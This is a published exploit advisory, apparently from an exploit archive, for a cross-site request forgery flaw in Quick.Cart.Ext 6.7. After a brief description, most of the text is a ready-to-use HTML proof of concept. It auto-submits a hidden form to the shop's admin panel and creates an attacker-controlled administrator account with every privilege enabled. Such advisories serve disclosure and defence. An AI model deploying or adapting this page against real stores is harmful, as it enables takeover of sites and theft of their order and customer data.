Quick.Cart.Ext 6.7 Cross Site Request Forgery
Posted on 23 June 2016
<!-- # Exploit Title: Quick.Cart.Ext <= v6.7 Remote Admin Add CSRF Exploit # Exploit Author: s0nk3y # Contact : s0nk3y at gmail com # Google Dork: - # Date: 22/06/2016 # Vendor Homepage: https://opensolution.org # Software Link: http://opensolution.org/download/home.html?sFile=Quick.Cart_v6.7.zip # Version: 6.7 # Tested on: Ubuntu 16.04 Quick.Cart.Ext is vulnerable to CSRF attack (No CSRF token in place) meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), a form will be submitted to (http://server/Quick.Cart.Ext/admin.php?p=admins-form) that will add a new user as administrator. Once exploited, the attacker can login to the admin panel ( http://localhost/Quick.Cart.Ext/admin.php) using the username and the password he posted in the form. CSRF PoC Code ============= --> <form method="post" action="http://server/Quick.Cart.Ext/admin.php?p=admins-form"> <input type="hidden" name="sLogin=attacker"/> <input type="hidden" name="sPass" value="attacker"/> <input type="hidden" name="sName" value="attacker"/> <input type="hidden" name="sEmail" value="attacker@email.com"/> <input type="hidden" name="iAdmin" value="2"/> <input type="hidden" name="sOption=save+»"/> <input type="hidden" name="aPrivilagesForm[products-list]" value="1"/> <input type="hidden" name="aPrivilagesForm[products-form]" value="1"/> <input type="hidden" name="aPrivilagesForm[products-delete]" value="1"/> <input type="hidden" name="aPrivilagesForm[products-export]" value="1"/> <input type="hidden" name="aPrivilagesForm[products-import]" value="1"/> <input type="hidden" name="aPrivilagesForm[orders-list]" value="1"/> <input type="hidden" name="aPrivilagesForm[orders-form]" value="1"/> <input type="hidden" name="aPrivilagesForm[orders-delete]" value="1"/> <input type="hidden" name="aPrivilagesForm[pages-list]" value="1"/> <input type="hidden" name="aPrivilagesForm[pages-form]" value="1"/> <input type="hidden" name="aPrivilagesForm[pages-delete]" value="1"/> <input type="hidden" name="aPrivilagesForm[shipping]" value="1"/> <input type="hidden" name="aPrivilagesForm[payments]" value="1"/> <input type="hidden" name="aPrivilagesForm[tools-config]" value="1"/> <input type="hidden" name="aPrivilagesForm[admins]" value="1"/> <input type="hidden" name="aPrivilagesForm[lang]" value="1"/> <input type="hidden" name="aPrivilagesForm[backup-list]" value="1"/> <input type="hidden" name="aPrivilagesForm[backup-create]" value="1"/> <input type="hidden" name="aPrivilagesForm[fixes]" value="1"/> <input type="hidden" name="aPrivilagesForm[plugins]" value="1"/> <input type="hidden" name="aPrivilagesForm[boxes]" value="1"/> <input type="hidden" name="aPrivilagesForm[vouchers]" value="1"/> <input type="hidden" name="aPrivilagesForm[features]" value="1"/> <input type="hidden" name="aPrivilagesForm[products-comments-list]" value="1"/> <input type="hidden" name="aPrivilagesForm[pages-comments-list]" value="1"/> <input type="hidden" name="aPrivilagesForm[comments-delete]" value="1"/> <input type="hidden" name="aPrivilagesForm[users]" value="1"/> <input type="hidden" name="iStatus" value="1"/> </form> <script> document.forms[0].submit(); </script>
